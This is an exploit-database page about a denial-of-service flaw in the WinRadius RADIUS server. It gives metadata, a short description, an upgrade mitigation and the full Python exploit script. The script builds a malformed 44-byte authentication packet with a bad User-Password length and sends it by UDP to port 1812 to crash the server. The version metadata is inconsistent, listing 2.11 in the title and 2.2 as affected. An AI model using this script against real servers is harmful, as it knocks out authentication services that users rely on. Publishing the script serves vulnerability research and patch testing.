WinRadius 2.11 DoS

vendor:

WinRadius

by:

npn

7,5

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: WinRadius

Affected Version From: 2.2

Affected Version To: 2.2

Patch Exists: YES

Related CWE: N/A

CPE: a:itconsult2000:winradius

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 English

2013

WinRadius 2.11 is vulnerable to a Denial of Service attack. An attacker can send a crafted packet with a length of 44 bytes to the WinRadius server on port 1812, causing the server to crash. The packet contains a code of 01, a packet identifier of 0xff, a length of 0x002c, an authenticator of 0xd1568a38fbea4a40b78aa27a8f3eae23, a User-Name of 0x01066164616d, a User-Password of 0x02fffff013 and a password of 0xf013577e481e55aa7d296d7a88188921.

Mitigation:

Upgrade to a version of WinRadius that is not vulnerable to this attack.

Source

Exploit-DB raw data:

#!/usr/bin/python


#Exploit Title: WinRadius 2.11 DoS
#Date: 10th June 2013
#Exploit Author: npn
#Exploit Author Homepage: http://www.iodigitalsec.com/
#Exploit Author Write Up: http://www.iodigitalsec.com/blog/fuzz-to-denial-of-service-winradius-2-11/
#Vendor Homepage: [ADVERT HOLDING PAGE] http://www.itconsult2000.com/
#Software Link: http://download.cnet.com/WinRadius/3000-2085_4-10131429.html
#Version: 2.2
#Tested on: Windows XP SP3 English
#Exploit-DB Note: Read author's write-up

from socket import *
import sys
import select

pwn =  "\x01" #Code 01
pwn += "\xff" #packet identifier
pwn += "\x00\x2c" #len 44
pwn += "\xd1\x56\x8a\x38\xfb\xea\x4a\x40\xb7\x8a\xa2\x7a\x8f\x3e\xae\x23" #authenticator
pwn += "\x01" #t=User-Name(1)
pwn += "\x06" #avp: l=6
pwn += "\x61\x64\x61\x6d" #adam

pwn += "\x02" #avp t=User-Password(2)
pwn += "\xff" #avp: l=18 
pwn += "\xf0\x13\x57\x7e\x48\x1e\x55\xaa\x7d\x29\x6d\x7a\x88\x18\x89\x21" #password (enc)

address = ('192.168.200.20', 1812)
server_socket = socket(AF_INET, SOCK_DGRAM)

server_socket.sendto(pwn, address)